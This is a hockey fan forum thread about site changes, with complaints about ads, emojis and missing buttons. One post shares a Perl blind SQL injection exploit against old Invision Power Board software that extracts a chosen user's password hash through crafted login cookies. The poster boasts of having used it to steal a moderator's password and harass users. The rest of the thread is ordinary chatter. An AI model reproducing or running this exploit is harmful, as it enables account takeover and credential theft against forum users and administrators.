IMPORTANT NEWS ABOUT HFBOARDS - Please read!

OldCraig71

Feb 2, 2009
No one cares
giphy.gif

Laurentide

Mar 24, 2018
Edmonton, Alberta
My favorite Rolling Stones song until about 10 years ago when I started listening to full albums. I also didn't know their earlier stuff had a huge blues influence.
The Stones didn't start out even wanting to be a rock band. They were all about the blues.

Speaking of which, the blue is gone and the board seems back to its old self again. Someone was obviously experimenting with live ammo yesterday.

groovejuice

Without deviation progress is not possible
Jun 27, 2011
Calgary
The Stones didn't start out even wanting to be a rock band. They were all about the blues.

Speaking of which, the blue is gone and the board seems back to its old self again. Someone was obviously experimenting with live ammo yesterday.

Fortunately, we have feedback in real time here. :laugh:

Habs

We should have drafted Michkov
Feb 28, 2002
Go back to the Perl/CGI based message board , or flat text, so I can run scripts on them again like the early 2000's. Here's how I used to get a certain mods password and have fun with his moniker. This worked on the very old forum, obviously won't work now, good times! And you wonder what happened to JohnnyV and the rest of the Bruins trolls that used to torture the habs forum? lol

Code:
#!/usr/bin/perl -wuse LWP::UserAgent;$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] .
 '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; 
# userid to jackmy $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3];

# cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2])
{print "..By ReMuSoMeGa & Nova. Usage: ipb.pl
 http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f")
;my $outputs = '';for( $i=1; $i < 33; $i++ )
{for( $j=0; $j < 16; $j++ ){my $current = $charset[$j]
;my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*"

:"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; "

. $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;

if ($dbug) { print };if ( !(/$pattern/) ){$outputs .= $current;print "$current\n";last;}}if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }}print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;exit;# ReMuSoMeGa & nova

j696Ek6.gif

S Bah

Nov 7, 2010
victoria bc
The Team Board that greets changes the best, gets their team two top five lottery choices with each having the chance of moving up only. ;)o_O:):):)

peate

Smiley
Sponsor
Feb 16, 2007
The Island
Where the hell did the Mark as read button go?

Edit: It's still there in other Forums, but not the HAbs one.

Last edited:
Reactions: vesperal

CHwest

Talent sets the floor, character sets the ceiling.
May 24, 2011
This site is almost unreadable on my tablet, advertising over the text regularly.

Runner77

Sponsor
Jun 24, 2012
Would it be possible to please update the emojis available to this site?

If you can add the following, would be greatly appreciated:

face-with-tears-of-joy_1f602.png
Other variations here: Face With Tears of Joy Emoji

And this classic:
puke.gif

Thanks.

Reactions: groovejuice

Runner77

Sponsor
Jun 24, 2012
Does anyone follow up on the suggestions made in this thread? It's like when some of us write open letters to Bergevin or RDS.

Are we the Father McKenzies from Eleanor Rigby -- writing words that no one will read or follow up on?

Myself and others have made several suggestions in this thread that have not been acted upon. Maybe this thread is not the right way to make such requests?

Can one of the admins please let us know the best way to proceed when we have a suggestion or something that could make our posting experience better?

For instance, could you leave the multi-quote function active for closed threads? Far too often, there are posts that we want to quote from closed threads and we're forced to manufacture a quote manually in order to recreate it in a new thread, which is time-consuming especially when several posts are involved.

Thanks in advance, I would greatly appreciate your reply.

Last edited:
Reactions: groovejuice

Fenway

HF Bookie and Bruins Historian
Sponsor
Sep 26, 2007
Cambridge, MA
Does anyone follow up on the suggestions made in this thread? It's like when some of us write open letters to Bergevin or RDS.

Are we the Father McKenzies from Eleanor Rigby -- writing words that no one will read or follow up on?

Myself and others have made several suggestions in this thread that have not been acted upon. Maybe this thread is not the right way to make such requests?

Can one of the admins please let us know the best way to proceed when we have a suggestion or something that could make our posting experience better?

For instance, could you leave the multi-quote function active for closed threads? Far too often, there are posts that we want to quote from closed threads and we're forced to manufacture a quote manually in order to recreate it in a new thread, which is time-consuming especially when several posts are involved.

Thanks in advance, I would greatly appreciate your reply.

For starters try starting a thread about suggestions in the support forum. There it will be seen by the tech ops people.

https://hfboards.mandatory.com/forums/support.68/

Reactions: MarkovsKnee

Ad

Upcoming events

Ad

Ad

-->